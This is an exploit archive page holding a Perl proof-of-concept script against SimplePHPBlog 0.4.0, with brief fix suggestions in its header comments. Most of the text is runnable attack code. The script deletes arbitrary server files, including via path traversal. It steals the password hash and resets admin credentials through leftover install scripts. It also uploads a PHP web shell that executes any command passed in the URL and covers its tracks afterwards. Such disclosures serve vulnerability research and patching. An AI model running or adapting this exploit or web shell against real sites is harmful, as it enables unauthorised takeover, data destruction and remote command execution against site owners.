exploit the possibilities

sphpblog_vulns.pl.txt

sphpblog_vulns.pl.txt
Posted Aug 31, 2005
Authored by Kenneth F. Belva | Site ftusecurity.com

Exploit that demonstrates a vulnerability in the comment_delete_cgi.php from SimplePHPBlog. The PHP script allows for the arbitrary deletion of files. This vulnerability, in combination with the fact that the installation scripts are left on the server after installation, allows an arbitrary user to reset the admin password to one of the attacker's choosing.

tags | exploit, arbitrary, php
SHA-256 | 0709918fda79c675a96d4652e41493a81d31f543e718af8b4e99466278e268a4

sphpblog_vulns.pl.txt

Change Mirror Download
#!/usr/bin/perl -w
#===============================================================================
# Title: sphpblog_vulns.pl
#
# Written by: Kenneth F. Belva, CISSP
# Franklin Technologies Unlimited, Inc.
# http://www.ftusecurity.com
#
# Date: August 25, 2005
#
# Version: 0.1
#
# Description: This program is for educational purposes only!
# SimplePHPBlog as a few vulnerability which this
# perl script demonstrates via an exploit.
#
# Instructions: Should be self-explanatory via the .pl help menu
#
# Solutions:
# *** Solution 1
# Change the line in comment_delete_cgi.php from
# $logged_in = logged_in( false, true ); to
# $logged_in = logged_in( true, true );
#
# *** Solution 2
# Place an .htaccess file with the following config in
# the ./config directory:
#
#
# #---------------------
# #Snip .htaccess start
# #---------------------
# IndexIgnore *
#
# <Files .htaccess>
# order allow,deny
# deny from all
# </Files>
#
# <Files *.txt>
# order allow,deny
# deny from all
# </Files>
# #---------------------
# #Snip .htaccess end
# #---------------------
#
#
# *** Solution 3
# See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
# for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
# Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
# Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
$unix="0"; #windows system
}else{
$unix="1"; #unix system
}

#-------------------------------------------------------------------------------
# The Main Menu
#-------------------------------------------------------------------------------

sub menu()
{
if ($unix){system("clear");}
else{system("cls");}

print "
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________

Program : $0
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.

Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!

Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com

Usage : $0 [-h host] [-e exploit]

-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File

Examples: $0 -h 127.0.0.1 -e 2
$0 -h 127.0.0.1 -e 3 -U l33t -P l33t
$0 -h 127.0.0.1 -e 4 -F ./index.php
$0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
$0 -h 127.0.0.1 -e 1
";

exit;
}


#-------------------------------------------------------------------------------
# Initial Routine
#-------------------------------------------------------------------------------

sub init()
{

use Switch;

# colon ':' after letter says that option takes variable
my $opt_string = 'e:U:P:h:F:?';
getopts( "$opt_string", \%args ) or menu();

#Load parameters
my $exploit = $args{e};
my $host = $args{h};
my $user = $args{U};
my $pass = $args{P};
my $file = $args{F};

# What shall we do today?
switch (%args) {
case "?" { menu();}
case "e" {
switch ($exploit) {

if ($unix){system("clear");}
else{system("cls");}

print "
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________";


# Upload cmd.php to /images
case "1" { print "\nRunning cmd.php Upload Exploit....\n\n";
&UploadCmdPHP($host);}
# Retrieve Username & Password hash
case "2" { print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
&RetrievePwd($host."/config/password.txt");}
# Replace Username and Password
case "3" { print "\nRunning Set New Username and Password Exploit....\n\n";
&SetUserPwd($host,$user,$pass);}
# Delete a System File
case "4" { print "\nRunning Delete System File Exploit....\n\n";
&DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

} #end $exploit switch
print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
} #end "e" case
else { menu();}
} #end %args switch

} #end sub init

#-------------------------------------------------------------------------------
# Exploit #1: Upload File Via POST
#-------------------------------------------------------------------------------

sub UploadCmdPHP {


my($url) = @_;

use LWP;
use HTTP::Request::Common qw(POST);
my $ua = LWP::UserAgent->new;

$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

#Step 1: Retrieve hash
#-----------------------------------------------------------------------
my $hash = &RetrievePwd($url."/config/password.txt");


#Step 2: Delete Existing Password file (SetUserPwd)
#Step 3: Create a temporary user id and password (SetUserPwd)
#-----------------------------------------------------------------------
&SetUserPwd($url,"a","a");


#Step 4: Log into the app and get the PHPSession / my_id session variable
#-----------------------------------------------------------------------
my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));


#Step 5: Create and upload our scripts (cmd.php & reset.php)
#-----------------------------------------------------------------------
&CreateTempPHPs();

# Upload cmd.php
my $path = "./cmd.php";
my $file = "cmd.php";
my $req = POST($url."/upload_img_cgi.php",
Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
Content_Type => 'form-data',
Content => [userfile => [$path,$file],],
);

my $response = $ua->request($req);
print "\nCreated cmd.php on target host: " . $url;
#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
#return $response->as_string;

# Upload reset.php
$path = "./reset.php";
$file = "reset.php";

$req = POST($url."/upload_img_cgi.php",
Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
Content_Type => 'form-data',
Content => [userfile => [$path,$file],],
);

$response = $ua->request($req);
print "\nCreated reset.php on target host: " . $url;
#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
#return $response->as_string;

#Remove local PHP files
&RemoveTempPHPs();


#Step 6: Reset origional Passwpord
#-----------------------------------------------------------------------
&ResetHash($url."/images/reset.php",$hash);


#Step 7: Pass command to delete reset.php (clean up)
#-----------------------------------------------------------------------
&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
print "\nRemoved reset.php from target host: " . $url;

print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
# Exploit #2: Retrieve Password File
#-------------------------------------------------------------------------------

sub RetrievePwd {

my($url) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = GET($url);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

my $hash = $response->content;
print "\nRetrieved Username and Password Hash: " . $hash;
return $hash

}


#-------------------------------------------------------------------------------
# Exploit #3: Set New Username and Password
#-------------------------------------------------------------------------------

sub SetUserPwd{

my($url,$user,$pass) = @_;

&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
&ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
# POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {

my($url,$user,$pass) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ user => $user,
pass => $pass,
submit => '%C2%A0Submit%C2%A0'
]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\n./config/password.txt created!";
print "\nUsername is set to: ".$user;
print "\nPassword is set to: ".$pass;

}


#-------------------------------------------------------------------------------
# Exploit #4: Delete Password File
#-------------------------------------------------------------------------------

sub DeleteFile {

my($url,$file) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = GET($url.$file);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;
print "\nDeleted File: ".$file;

}


#-------------------------------------------------------------------------------
# log into site
#-------------------------------------------------------------------------------

sub Login {

my($url,$user,$pass) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ user => $user,
pass => $pass,
submit => '%C2%A0Submit%C2%A0'
]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\nLogged into SimplePHPBlog at: ".$url;
print "\nCurrent Username '".$user."' and Password '".$pass."'...";

return $response->header('Set-Cookie');

}


#-------------------------------------------------------------------------------
# POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

my($url,$hash) = @_;

use LWP;
use HTTP::Request::Common;
my $ua = LWP::UserAgent->new;

my $req = POST($url,
[ hash => $hash]
);

my $response = $ua->request($req);

$response->is_success or die "Failed to POST '$url': ", $response->status_line;

print "\nReset Hash at: ".$url;
print "\nReset Hash value: ".$hash;


}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

my($hash) = @_;

open(PHPFILE, ">./cmd.php");
print PHPFILE &CreateCmdPHP();
close PHPFILE;
print "\nCreated cmd.php on your local machine.";

open(PHPFILE, ">./reset.php");
print PHPFILE &CreateResetPHP();
close PHPFILE;
print "\nCreated reset.php on your local machine.";
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

unlink("./cmd.php");
print "\nRemoved cmd.php from your local machine.";
unlink("./reset.php");
print "\nRemoved reset.php from your local machine.";

}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {

my($savedata) = @_;

my $PHPstring = "PHPSESSID";
my $semi = "\;";

my $datalength = length($savedata);
my $PHPstart= (index $savedata, $PHPstring)+10;
my $PHPend = index $savedata,$semi,$PHPstart;
my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
return $PHPsession;

}


sub CreateCmdPHP(){

return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end

}


sub CreateResetPHP(){

return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
# Begin Routines
#------------------------------------------------------
init();


Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close